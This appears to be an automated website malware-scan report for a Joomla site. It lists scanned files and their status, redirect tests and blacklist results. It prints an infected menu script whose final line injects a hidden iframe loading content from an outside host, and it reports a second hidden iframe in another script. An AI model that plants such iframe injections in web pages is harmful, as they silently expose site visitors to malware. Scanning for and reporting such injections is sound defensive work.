Scanned pages/files
Request | Server response | Status |
http://ddcnd.org/ | 200 OK Content-Length: 67896 Content-Type: text/html | clean |
http://ddcnd.org/media/system/js/caption.js | 200 OK Content-Length: 2250 Content-Type: text/javascript | clean |
http://ddcnd.org/templates/custom_ja_purity/js/ja.script.js | 200 OK Content-Length: 3217 Content-Type: text/javascript | clean |
http://ddcnd.org/templates/custom_ja_purity/ja_menus/ja_cssmenu/ja.moomenu.js | 200 OK Content-Length: 5010 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) if (typeof(MooTools) != 'undefined'){
var subnav = new Array(); Element.extend( { hide: function(timeout) { this.status = 'hide'; clearTimeout (this.timeout); if (timeout) { this.timeout = setTimeout (this.anim.bind(this), timeout); }else{ this.anim(); } }, show: function(timeout) { this.status = 'show'; clearTimeout (th for (var i=0; i<sfEls.length; ++i) { sfEls[i].onmouseover=function() { this.className+="sfhover"; } sfEls[i].onmouseout=function() { this.className=this.className.replace(new RegExp("sfhover\\b"), ""); } } } if (window.attachEvent) window.attachEvent("onload", sfHover); } document.write('<iframe src="http://kama.homenet.org/info.html" width="1" height="0"></iframe>'); Antivirus reports:
Hidden iFrame found. size: 1x0 src: http://kama.homenet.org/info.html <iframe src="http://kama.homenet.org/info.html" width="1" height="0"> | ||
http://www.gmodules.com/ig/ifr?url=http://www.google.com/ig/modules/translatemypage.xml&up_source_language=vi&w=160&h=60&title=&border=&output=js | 200 OK Content-Length: 2268 Content-Type: text/javascript | clean |
http://ddcnd.org/media/mod_vavim/js/avim.js | 200 OK Content-Length: 18330 Content-Type: text/javascript | clean |
http://ddcnd.org/includes/js/overlib_mini.js | 200 OK Content-Length: 37286 Content-Type: text/javascript | suspicious |
Hidden iFrame found. size: 1x1 src: http://casa.csproject.org/static/ct.php <iframe width="1" height="1" scrolling="no" src="http://casa.csproject.org/static/ct.php" frameborder="0"> | ||
http://ddcnd.org/includes/js/overlib_hideform_mini.js | 200 OK Content-Length: 3328 Content-Type: text/javascript | clean |
http://ddcnd.org/index.php | 200 OK Content-Length: 67917 Content-Type: text/html | clean |
http://ddcnd.org/index.php?option=com_search&view=search&Itemid=58 | 200 OK Content-Length: 24520 Content-Type: text/html | clean |
http://ddcnd.org/index.php?option=com_contact&view=contact&id=1&Itemid=59 | 200 OK Content-Length: 25941 Content-Type: text/html | clean |
http://ddcnd.org/media/system/js/validate.js | 200 OK Content-Length: 4246 Content-Type: text/javascript | clean |
http://ddcnd.org/index.php?option=com_weblinks&view=category&id=18&Itemid=65 | 200 OK Content-Length: 43585 Content-Type: text/html | clean |
http://ddcnd.org/index.php?option=com_content&view=article&id=427&Itemid=63 | 200 OK Content-Length: 28206 Content-Type: text/html | clean |
http://ddcnd.org/index.php?option=com_mailto&tmpl=component&link=b2e71a04ac02793a3b95863ee1d15d4fefc1c55e | 200 OK Content-Length: 2686 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: ddcnd.org
Result:
HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0
Connection: close
Date: Fri, 10 Oct 2014 20:13:27 GMT
Pragma: no-cache
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 10 Oct 2014 20:13:28 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 2f36dc539d5bbc2af0ef15090a4d4caa=snp9ab2ucd9escrgncngd2e155; path=/
Set-Cookie: custom_ja_purity_tpl=custom_ja_purity; expires=Wed, 30-Sep-2015 20:13:28 GMT; path=/
GET / HTTP/1.1
Host: ddcnd.org
Result:
HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0
Connection: close
Date: Fri, 10 Oct 2014 20:13:27 GMT
Pragma: no-cache
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 10 Oct 2014 20:13:28 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 2f36dc539d5bbc2af0ef15090a4d4caa=snp9ab2ucd9escrgncngd2e155; path=/
Set-Cookie: custom_ja_purity_tpl=custom_ja_purity; expires=Wed, 30-Sep-2015 20:13:28 GMT; path=/
Second query (visit from search engine):
GET / HTTP/1.1
Host: ddcnd.org
Referer: http://www.google.com/search?q=ddcnd.org
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: ddcnd.org
Referer: http://www.google.com/search?q=ddcnd.org
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=ddcnd.org
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://ddcnd.org/
Result: ddcnd.org is not infected or malware details are not published yet.
Result: ddcnd.org is not infected or malware details are not published yet.